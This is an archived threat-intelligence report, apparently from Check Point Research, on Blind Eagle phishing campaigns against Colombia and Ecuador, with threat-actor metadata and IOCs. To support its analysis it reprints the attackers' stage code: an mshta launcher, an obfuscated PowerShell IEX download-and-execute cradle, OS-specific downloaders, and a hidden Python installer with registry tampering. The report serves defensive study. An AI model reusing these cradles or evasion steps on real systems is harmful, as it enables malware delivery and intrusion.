{ "id": "cbd96a70-d240-456c-8d17-52689820f252", "created_at": "2026-04-07T15:34:36.869422Z", "updated_at": "2026-04-10T03:35:20.379334Z", "deleted_at": null, "sha1_hash": "b84df3f110b07ff5fc57cff1f79e5b4df1cd0c87", "title": "BlindEagle Targeting Ecuador With Sharpened Tools", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 97560, "plain_text": "BlindEagle Targeting Ecuador With Sharpened Tools\r\nBy itayc\r\nPublished: 2023-01-05 · Archived: 2026-04-07 15:12:45 UTC\r\nHIGHLIGHTS:\r\nAPT-C-36, also known as Blind Eagle, is a financially motivated threat group that has been launching indiscriminate\r\nattacks against citizens of various countries in South America since at least 2018.\r\nIn a recent campaign targeting Ecuador based organizations, CPR detected a new infection chain that involves a\r\nmore advanced toolset.\r\nThe backdoor chosen for this campaign is typically used by espionage campaigns, which is unusual for this group\r\nACTIVE CAMPAIGNS AGAINST COLOMBIAN TARGETS\r\nFor the last few months, we have been observing the ongoing campaigns orchestrated by Blind Eagle, which have mostly\r\nadhered to the TTPs described above — phishing emails pretending to be from the Colombian government. One typical\r\nexample is an email purportedly from the Ministry of Foreign Affairs, threatening the recipient with issues when leaving the\r\ncountry unless they settle a bureaucratic matter.\r\nSuch emails usually feature either a malicious document or a malicious link, but in this case, the attackers said “why not\r\nboth?” and included both a link and a terse attached PDF directing the unfortunate victim to the exact same link.\r\nIn both cases, the link in question consists of a legitimate link-shortening service URL that geolocates victims and makes\r\nthem communicate with a different “server” depending on the original country ( https://gtly[.]to/QvlFV_zgh ). If the\r\nincoming HTTP request originates from outside Colombia, the server aborts the infection chain, acts innocent and redirects\r\nthe client to the official website of the migration department of the Colombian Ministry of Foreign Affairs.\r\nIf the incoming request seems to arrive from Colombia, the infection chain proceeds as scheduled. The server responds to\r\nthe client with a file for download. This is a malware executable hosted on the file-sharing service MediaFire. The file is\r\ncompressed, similar to a ZIP file, using the LHA algorithm. It is password-protected, making it impervious against naive\r\nstatic analysis and even naive sandbox emulation. The password is found both in the email and in the attached PDF.\r\nhttps://research.checkpoint.com/2023/blindeagle-targeting-ecuador-with-sharpened-tools/\r\nPage 1 of 9\n\nThe malicious executable inside the LHA is written in .Net and packed. When unpacked, a modified sample of QuasarRAT\r\nis revealed.\r\nQuasarRAT is an open source trojan available in multiple sources like Github. The (probably Spanish-speaking) actors\r\nbehind this APT group have added some extra capabilities over the last few years, which are easy to spot due to the names of\r\nfunctions and variables in Spanish. This process, by which threat actors abuse access to malware sources and each create\r\ntheir own special versions of that malware, is sadly not without precedent in the security landscape and always makes us\r\nheave a sad sigh when we encounter it.\r\nAlthough QuasarRAT is not a dedicated banking Trojan, it can be observed from the sample’s embedded strings that the\r\ngroup’s main goal in the campaign was to intercept victim access to their bank account.\r\nThis is a complete list of targeted entities:\r\nBancolombia Sucursal Virtual Personas\r\nSucursal_Virtual_Empresas_\r\nPortal Empresarial Davivienda\r\nBBVA Net Cash\r\nColpatria – Banca Empresas\r\nbancaempresas.bancocajasocial.com\r\nEmpresarial Banco de Bogota\r\nconexionenlinea.bancodebogota.com\r\nAV Villas – Banca Empresarial\r\nBancoomeva Banca Empresarial\r\nTRANSUNION\r\nBanco Popular\r\nportalpymes\r\nBlockchain\r\nDashboardDavivienda\r\nSome extra features added to Quasar by this group are a function named “ActivarRDP” (activate RDP) and two more to\r\nactivate and deactivate the system Proxy:\r\nhttps://research.checkpoint.com/2023/blindeagle-targeting-ecuador-with-sharpened-tools/\r\nPage 2 of 9\n\nAlong with a few more commands that incur technical debt by impudently disregarding Quasar’s convention for function\r\nname and parameter order:\r\nA BETTER CAMPAIGN FEATURING NEWER TOOLS\r\nOne specific sample caught our attention as it was related to a government institution from Ecuador and not from Colombia.\r\nWhile Blind Eagle attacking Ecuador is not unprecedented, it is still unusual. Similarly to the campaign described above, the\r\ngeo-filter server in this campaign redirects requests outside of Ecuador and Colombia to the website of the Ecuadorian\r\nInternal Revenue Service:\r\nIf contacted from Colombia or Ecuador, the downloaded file from Mediafire will be a RAR archive with a password. But\r\ninstead of a single executable consisting of some packed RAT, the infection chain, in this case, is much more elaborate:\r\nhttps://research.checkpoint.com/2023/blindeagle-targeting-ecuador-with-sharpened-tools/\r\nPage 3 of 9\n\nInside the RAR archive, there is an executable built with PyInstaller with a rather simplistic Python 3.10 code. This code just\r\nadds a new stage in the infection chain:\r\nPlain text\r\nCopy to clipboard\r\nOpen code in new window\r\nEnlighterJS 3 Syntax Highlighter\r\nimport os\r\nimport subprocess\r\nimport ctypes\r\nctypes.windll.user32.ShowWindow(ctypes.windll.kernel32.GetConsoleWindow(), 0)\r\nwsx = 'mshta \u003chttps://gtly\u003e [.] to/dGBeBqd8z'\r\nos.system(wsx)\r\nimport os import subprocess import ctypes\r\nctypes.windll.user32.ShowWindow(ctypes.windll.kernel32.GetConsoleWindow(), 0) wsx = 'mshta \u003chttps://gtly\u003e [.]\r\nto/dGBeBqd8z' os.system(wsx)\r\nimport os\r\nimport subprocess\r\nimport ctypes\r\nctypes.windll.user32.ShowWindow(ctypes.windll.kernel32.GetConsoleWindow(), 0)\r\nwsx = 'mshta \u003chttps://gtly\u003e [.] to/dGBeBqd8z'\r\nos.system(wsx)\r\nmshta is a utility that executes Microsoft HTML Applications, and the attackers abuse it here to download and execute the\r\nnext stage, which contains VBS code embedded in an HTML.\r\nPlain text\r\nCopy to clipboard\r\nOpen code in new window\r\nEnlighterJS 3 Syntax Highlighter\r\n\u003cscript language=\"VBScript\"\u003e\r\nCreateObject(\"Wscript.Shell\").run\"powershell.exe -noexit \"\"$a1='IEX ((new-object\r\nnet.webclient).downl';$a2='oadstring(''https://[malicious domain]/wins''))';$a3=\"\"$a1,$a2\"\";IEX(-join $a3)\"\"\", 0, true\r\nself.close\r\n\u003c/script\u003e\r\n\u003cscript language=\"VBScript\"\u003e CreateObject(\"Wscript.Shell\").run\"powershell.exe -noexit \"\"$a1='IEX ((new-object\r\nnet.webclient).downl';$a2='oadstring(''https://[malicious domain]/wins''))';$a3=\"\"$a1,$a2\"\";IEX(-join $a3)\"\"\", 0, true\r\nself.close \u003c/script\u003e\r\n\u003cscript language=\"VBScript\"\u003e\r\nCreateObject(\"Wscript.Shell\").run\"powershell.exe -noexit \"\"$a1='IEX ((new-object net.webclient).downl';$a2='oa\r\nself.close\r\n\u003c/script\u003e\r\nUsually campaigns by Blind Eagle abuse legitimate file sharing services such as Mediafire or free dynamic domains like\r\n“*.linkpc.net”; this case is different, and the next stage is hosted at the malicious domain upxsystems[.]com.\r\nThis next-stage downloads and executes yet another next-stage, a script written in Powershell:\r\nPlain text\r\nCopy to clipboard\r\nOpen code in new window\r\nhttps://research.checkpoint.com/2023/blindeagle-targeting-ecuador-with-sharpened-tools/\r\nPage 4 of 9\n\nEnlighterJS 3 Syntax Highlighter\r\nfunction StartA{\r\n[version]$OSVersion = [Environment]::OSVersion.Version\r\nIf ($OSVersion -gt \"10.0\") {\r\niex (new-object net.webclient).downloadstring(\"https://[malicious domain]/covidV22/ini/w10/0\")\r\n} ElseIf ($OSVersion -gt \"6.3\") {\r\niex (new-object net.webclient).downloadstring(\"https://[malicious domain]/covidV22/ini/w8/0\")\r\n} ElseIf ($OSVersion -gt \"6.2\") {\r\niex (new-object net.webclient).downloadstring(\"https://[malicious domain]/covidV22/ini/w8/0\")\r\n} ElseIf ($OSVersion -gt \"6.1\") {\r\niex (new-object net.webclient).downloadstring(\"http://[malicious domain]/covidV22/ini/w7/0\")\r\n}\r\n}\r\nStartA\r\nfunction StartA{ [version]$OSVersion = [Environment]::OSVersion.Version If ($OSVersion -gt \"10.0\") { iex (new-object\r\nnet.webclient).downloadstring(\"https://[malicious domain]/covidV22/ini/w10/0\") } ElseIf ($OSVersion -gt \"6.3\") { iex\r\n(new-object net.webclient).downloadstring(\"https://[malicious domain]/covidV22/ini/w8/0\") } ElseIf ($OSVersion -gt \"6.2\")\r\n{ iex (new-object net.webclient).downloadstring(\"https://[malicious domain]/covidV22/ini/w8/0\") } ElseIf ($OSVersion -gt\r\n\"6.1\") { iex (new-object net.webclient).downloadstring(\"http://[malicious domain]/covidV22/ini/w7/0\") } } StartA\r\nfunction StartA{\r\n[version]$OSVersion = [Environment]::OSVersion.Version\r\nIf ($OSVersion -gt \"10.0\") {\r\n iex (new-object net.webclient).downloadstring(\"https://[malicious domain]/covidV22/ini/w10/0\")\r\n} ElseIf ($OSVersion -gt \"6.3\") {\r\n iex (new-object net.webclient).downloadstring(\"https://[malicious domain]/covidV22/ini/w8/0\")\r\n} ElseIf ($OSVersion -gt \"6.2\") {\r\n iex (new-object net.webclient).downloadstring(\"https://[malicious domain]/covidV22/ini/w8/0\")\r\n} ElseIf ($OSVersion -gt \"6.1\") {\r\n iex (new-object net.webclient).downloadstring(\"http://[malicious domain]/covidV22/ini/w7/0\")\r\n}\r\n}\r\nStartA\r\nThe above Powershell checks the system version and downloads the appropriate additional Powershell. This additional OS-specific Powershell checks for installed AV tools and behaves differently based on its findings.\r\nThe main difference between each next stage consists in different pieces of code that will try to disable the security solution\r\n(for example Windows Defender), but in all cases, regardless of the type of security solution installed on the computer, the\r\nnext stagewill download a version of python suitable for the target OS and install it:\r\nPlain text\r\nCopy to clipboard\r\nOpen code in new window\r\nEnlighterJS 3 Syntax Highlighter\r\nFunction PY(){\r\nif([System.IntPtr]::Size -eq 4)\r\n{\r\n$progressPreference = 'silentlyContinue'\r\n$url = \"\u003chttps://www.python.org/ftp/python/3.9.9/python-3.9.9-embed-win32.zip\u003e\"\r\nhttps://research.checkpoint.com/2023/blindeagle-targeting-ecuador-with-sharpened-tools/\r\nPage 5 of 9\n\n$output = \"$env:PUBLIC\\\\py.zip\"\r\n$start_time = Get-Date\r\n$wc = New-Object System.Net.WebClient\r\n$wc.DownloadFile($url, $output)\r\nNew-Item \"$env:PUBLIC\\\\py\" -type directory\r\n$FILE=Get-Item \"$env:PUBLIC\\\\py\" -Force\r\n$FILE.attributes='Hidden'\r\n$shell = New-Object -ComObject Shell.Application\r\n$zip = $shell.Namespace(\"$env:PUBLIC\\\\py.zip\")\r\n$items = $zip.items()\r\n$shell.Namespace(\"$env:PUBLIC\\\\py\").CopyHere($items, 1556)\r\nstart-sleep -Seconds 2;\r\nRemove-Item \"$env:PUBLIC\\\\py.zip\"\r\nRemove-Item \"$env:USERPROFILE\\\\PUBLIC\\\\Local\\\\Microsoft\\\\WindowsApps\\\\*.*\" -Recurse -Force\r\nRemove-Item \"$env:USERPROFILE\\\\AppData\\\\Local\\\\Microsoft\\\\WindowsApps\\\\*.*\" -Recurse -Force\r\nsetx PATH \"$env:path;$env:PUBLIC\\\\py\"\r\nNew-Item -Path HKCU:\\\\Software\\\\Classes\\\\Applications\\\\python.exe\\\\shell\\\\open\\\\command\\\\ -Value\r\n\"\"\"$env:PUBLIC\\\\py\\\\python.exe\"\" \"\"%1\"\"\" -Force\r\nSet-ItemProperty -path 'hkcu:\\\\Software\\\\Classes\\\\Local Settings\\\\Software\\\\Microsoft\\\\Windows\\\\Shell\\\\MuiCache\\\\' -name\r\n\"$env:PUBLIC\\\\py\\\\python.exe.ApplicationCompany\" -value \"Python Software Foundation\"\r\nSet-ItemProperty -path 'hkcu:\\\\Software\\\\Classes\\\\Local Settings\\\\Software\\\\Microsoft\\\\Windows\\\\Shell\\\\MuiCache\\\\' -name\r\n\"$env:PUBLIC\\\\py\\\\python.exe.FriendlyAppName\" -value \"Python\"\r\n}\r\n....\r\nFunction PY(){ if([System.IntPtr]::Size -eq 4) { $progressPreference = 'silentlyContinue' $url = \"\r\n\u003chttps://www.python.org/ftp/python/3.9.9/python-3.9.9-embed-win32.zip\u003e\" $output = \"$env:PUBLIC\\\\py.zip\" $start_time =\r\nGet-Date $wc = New-Object System.Net.WebClient $wc.DownloadFile($url, $output) New-Item \"$env:PUBLIC\\\\py\" -type\r\ndirectory $FILE=Get-Item \"$env:PUBLIC\\\\py\" -Force $FILE.attributes='Hidden' $shell = New-Object -ComObject\r\nShell.Application $zip = $shell.Namespace(\"$env:PUBLIC\\\\py.zip\") $items = $zip.items()\r\n$shell.Namespace(\"$env:PUBLIC\\\\py\").CopyHere($items, 1556) start-sleep -Seconds 2; Remove-Item\r\n\"$env:PUBLIC\\\\py.zip\" Remove-Item \"$env:USERPROFILE\\\\PUBLIC\\\\Local\\\\Microsoft\\\\WindowsApps\\\\*.*\" -Recurse -\r\nForce Remove-Item \"$env:USERPROFILE\\\\AppData\\\\Local\\\\Microsoft\\\\WindowsApps\\\\*.*\" -Recurse -Force setx PATH\r\n\"$env:path;$env:PUBLIC\\\\py\" New-Item -Path\r\nHKCU:\\\\Software\\\\Classes\\\\Applications\\\\python.exe\\\\shell\\\\open\\\\command\\\\ -Value \"\"\"$env:PUBLIC\\\\py\\\\python.exe\"\"\r\n\"\"%1\"\"\" -Force Set-ItemProperty -path 'hkcu:\\\\Software\\\\Classes\\\\Local\r\nSettings\\\\Software\\\\Microsoft\\\\Windows\\\\Shell\\\\MuiCache\\\\' -name \"$env:PUBLIC\\\\py\\\\python.exe.ApplicationCompany\" -\r\nvalue \"Python Software Foundation\" Set-ItemProperty -path 'hkcu:\\\\Software\\\\Classes\\\\Local\r\nSettings\\\\Software\\\\Microsoft\\\\Windows\\\\Shell\\\\MuiCache\\\\' -name \"$env:PUBLIC\\\\py\\\\python.exe.FriendlyAppName\" -\r\nvalue \"Python\" } ....\r\nFunction PY(){\r\n if([System.IntPtr]::Size -eq 4)\r\n {\r\n $progressPreference = 'silentlyContinue'\r\n $url = \"\u003chttps://www.python.org/ftp/python/3.9.9/python-3.9.9-embed-win32.zip\u003e\"\r\n $output = \"$env:PUBLIC\\\\py.zip\"\r\n $start_time = Get-Date\r\n $wc = New-Object System.Net.WebClient\r\n $wc.DownloadFile($url, $output)\r\n New-Item \"$env:PUBLIC\\\\py\" -type directory\r\n $FILE=Get-Item \"$env:PUBLIC\\\\py\" -Force\r\nhttps://research.checkpoint.com/2023/blindeagle-targeting-ecuador-with-sharpened-tools/\r\nPage 6 of 9\n\n$FILE.attributes='Hidden'\r\n $shell = New-Object -ComObject Shell.Application\r\n $zip = $shell.Namespace(\"$env:PUBLIC\\\\py.zip\")\r\n $items = $zip.items()\r\n $shell.Namespace(\"$env:PUBLIC\\\\py\").CopyHere($items, 1556)\r\n start-sleep -Seconds 2;\r\n Remove-Item \"$env:PUBLIC\\\\py.zip\"\r\n Remove-Item \"$env:USERPROFILE\\\\PUBLIC\\\\Local\\\\Microsoft\\\\WindowsApps\\\\*.*\" -Recurse -Force\r\n Remove-Item \"$env:USERPROFILE\\\\AppData\\\\Local\\\\Microsoft\\\\WindowsApps\\\\*.*\" -Recurse -Force\r\n setx PATH \"$env:path;$env:PUBLIC\\\\py\"\r\n New-Item -Path HKCU:\\\\Software\\\\Classes\\\\Applications\\\\python.exe\\\\shell\\\\open\\\\command\\\\ -Value \"\"\"$e\r\n Set-ItemProperty -path 'hkcu:\\\\Software\\\\Classes\\\\Local Settings\\\\Software\\\\Microsoft\\\\Windows\\\\Shell\\\r\n Set-ItemProperty -path 'hkcu:\\\\Software\\\\Classes\\\\Local Settings\\\\Software\\\\Microsoft\\\\Windows\\\\Shell\\\r\n }\r\n....\r\n \r\nIt will then download two scripts named mp.py and ByAV2.py which will be stored in the user %Public% folder and for\r\nwhich it will create a scheduled task that will run every 10 minutes. For Windows 7 the task will be created by downloading\r\nan XML from the C2 “upxsystems[.]com”, while for Windows 8, 8.1, and 10 the malware will create the task using the\r\ncmdlet “New-ScheduledTask*”.\r\nIn the case of Windows 7, the task is preconfigured to be executed as System and contains the following description\r\n\u003cDescription\u003e Mantiene actualizado tu software de Google. Si esta tarea se desactiva o se detiene, tu software de\r\nGoogle no se mantendrá actualizado, lo que implica que las vulnerabilidades de seguridad que puedan aparecer\r\nno podrán arreglarse y es posible que algunas funciones no anden. Esta tarea se desinstala automáticamente si\r\nningún software de Google la utiliza. \u003c/Description\u003e\r\nIt’s written using the kind of Spanish that is commonly spoken in the target countries, which can be noticed for example\r\nwith the use of “es posible que algunas funciones no anden” instead of “no se ejecuten” or any other variation more\r\ncommon in different geographic regions.\r\nThe full description can be translated to:\r\n“Keeps your Google software up to date. If this task is disabled or stopped, your Google software will not be kept up to date,\r\nwhich means that security vulnerabilities that may appear cannot be fixed and some features may not work. This task is\r\nautomatically uninstalled if no Google software uses it.”\r\nAfter downloading the Python scripts and adding persistence, the malware will try to kill all processes related to the\r\ninfection.\r\nRegarding the two downloaded scripts, both are obfuscated using homebrew encoding that consists of base64 repeated 5\r\ntimes (we will never, ever, tire of responding to such design choices with “known to be 5 times as secure as vanilla\r\nbase64”):\r\nAfter deciphering these strings for each script we obtain two different types of Meterpreter samples.\r\nByAV2.py\r\nThis code consists of an in-memory loader developed in Python, which will load and run a normal Meterpreter sample in\r\nDLL format that uses “tcp://systemwin.linkpc[.]net:443” as a C2 server.\r\nPython has a built-in PRNG, and in principle no one is stopping you from constructing a stream cipher based on it, which is\r\nwhat the malware authors do here. The embedded DLL is decrypted using this makeshift “randint stream cipher” with an\r\nembedded key (in this construction the key is used as the seed to prime the random library). In the grand tradition of\r\ncryptography used inside of malware purely to obfuscate buffers using a hardcoded key, the question of how secure this\r\nmakeshift cipher is has exactly zero consequences.\r\nhttps://research.checkpoint.com/2023/blindeagle-targeting-ecuador-with-sharpened-tools/\r\nPage 7 of 9\n\nmp.py\r\nThe second script basically consists of another sample of Meterpreter — this time a version developed entirely in Python\r\nand using the same C2 server. We can only speculate on why the server was configured to drop the same payload with the\r\nsame C2 server but written in a different language; possibly one of the samples acts as a plan B in case of the other sample\r\ngets detected by some antivirus solution and removed.\r\nCONCLUSION\r\nBlind Eagle is a strange bird among APT groups. Judging by its toolset and usual operations, it is clearly more interested in\r\ncybercrime and monetary gain than in espionage; however, unlike most such groups that just attack the entire world\r\nindiscriminately, Blind Eagle has a very narrow geographical focus, most of the time limited to a single country. This latest\r\ncampaign targeting Ecuador highlights how, over the last few years, Blind Eagle has matured as a threat — refining their\r\ntools, adding features to leaked code bases, and experimenting with elaborate infection chains and “Living off the Land” as\r\nseen with the clever abuse of mshta . If what we’ve seen is any indication, this group is worth keeping an eye on so that\r\nvictims aren’t blindsided by whatever clever thing they try next.\r\nCheck Point’s anti-phishing solutions for office 365 \u0026 G suite analyzes all historical emails in order to determine prior trust\r\nrelations between the sender and receiver, increasing the likelihood of identifying user impersonation or fraudulent\r\nmessages. Artificial Intelligence (AI) and Indicators of Compromise (IoCs) used in the past train the Harmony Email \u0026\r\nOffice platform for what to look for in complex zero-day phishing attacks.\r\nIOCs\r\n8e864940a97206705b29e645a2c2402c2192858357205213567838443572f564\r\n2702ea04dcbbbc3341eeffb494b692e15a50fbd264b1d676b56242aae3dd9001\r\nf80eb2fcefb648f5449c618e83c4261f977b18b979aacac2b318a47e99c19f64\r\n68af317ffde8639edf2562481912161cf398f0edba6e06745d90c1359554c76e\r\n61685ea4dc4ca4d01e0513d5e23ee04fc9758d6b189325b34d5b16da254cc9f4\r\nhttps://www.mediafire[.]com/file/cfnw8rwufptk5jz/migracioncolombiaprocesopendienteid2036521045875referenciawwwmigraciongovco.LHA/\r\nhttps://gtly[.]to/QvlFV_zgh\r\nhttps://gtly[.]to/cuOv3gNDi\r\nhttps://gtly[.]to/dGBeBqd8z\r\nlaminascol[.]linkpc[.]net\r\nsystemwin[.]linkpc[.]net\r\nupxsystems[.]com\r\nhttps://research.checkpoint.com/2023/blindeagle-targeting-ecuador-with-sharpened-tools/\r\nPage 8 of 9\n\nc63d15fe69a76186e4049960337d8c04c6230e4c2d3d3164d3531674f5f74cdf\r\n353406209dea860decac0363d590096e2a8717dd37d6b4d8b0272b02ad82472e\r\na03259900d4b095d7494944c50d24115c99c54f3c930bea08a43a8f0a1da5a2e\r\n46addee80c4c882b8a6903cced9b6c0130ec327ae8a59c5946bb954ccea64a12\r\nc067869ac346d007a17e2e91c1e04ca0f980e8e9c4fd5c7baa0cb0cc2398fe59\r\n10fd1b81c5774c1cc6c00cc06b3ed181b2d78191c58b8e9b54fa302e4990b13d\r\nc4ff3fb6a02ca0e51464b1ba161c0a7387b405c78ead528a645d08ad3e696b12\r\nac1ea54f35fe9107af1aef370e4de4dc504c8523ddaae10d95beae5a3bf67716\r\nSource: https://research.checkpoint.com/2023/blindeagle-targeting-ecuador-with-sharpened-tools/\r\nhttps://research.checkpoint.com/2023/blindeagle-targeting-ecuador-with-sharpened-tools/\r\nPage 9 of 9", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia", "MISPGALAXY", "ETDA" ], "references": [ "https://research.checkpoint.com/2023/blindeagle-targeting-ecuador-with-sharpened-tools/" ], "report_names": [ "blindeagle-targeting-ecuador-with-sharpened-tools" ], "threat_actors": [ { "id": "98b22fd7-bf1b-41a6-b51c-0e33a0ffd813", "created_at": "2022-10-25T15:50:23.688973Z", "updated_at": "2026-04-10T02:00:05.390055Z", "deleted_at": null, "main_name": "APT-C-36", "aliases": [ "APT-C-36", "Blind Eagle" ], "source_name": "MITRE:APT-C-36", "tools": [ "Imminent Monitor" ], "source_id": "MITRE", "reports": null }, { "id": "be597b07-0cde-47bc-80c3-790a8df34af4", "created_at": "2022-10-25T16:07:23.407484Z", "updated_at": "2026-04-10T02:00:04.58656Z", "deleted_at": null, "main_name": "Blind Eagle", "aliases": [ "APT-C-36", "APT-Q-98", "AguilaCiega", "G0099" ], "source_name": "ETDA:Blind Eagle", "tools": [ "AsyncRAT", "BitRAT", "Bladabindi", "BlotchyQuasar", "Imminent Monitor", "Imminent Monitor RAT", "Jorik", "LimeRAT", "Remcos", "RemcosRAT", "Remvio", "Socmer", "Warzone", "Warzone RAT", "njRAT" ], "source_id": "ETDA", "reports": null }, { "id": "bd43391b-b835-4cb3-839a-d830aa1a3410", "created_at": "2023-01-06T13:46:38.925525Z", "updated_at": "2026-04-10T02:00:03.147197Z", "deleted_at": null, "main_name": "APT-C-36", "aliases": [ "Blind Eagle" ], "source_name": "MISPGALAXY:APT-C-36", "tools": [], "source_id": "MISPGALAXY", "reports": null } ], "ts_created_at": 1775576076, "ts_updated_at": 1775792120, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/b84df3f110b07ff5fc57cff1f79e5b4df1cd0c87.pdf", "text": "https://archive.orkl.eu/b84df3f110b07ff5fc57cff1f79e5b4df1cd0c87.txt", "img": "https://archive.orkl.eu/b84df3f110b07ff5fc57cff1f79e5b4df1cd0c87.jpg" } }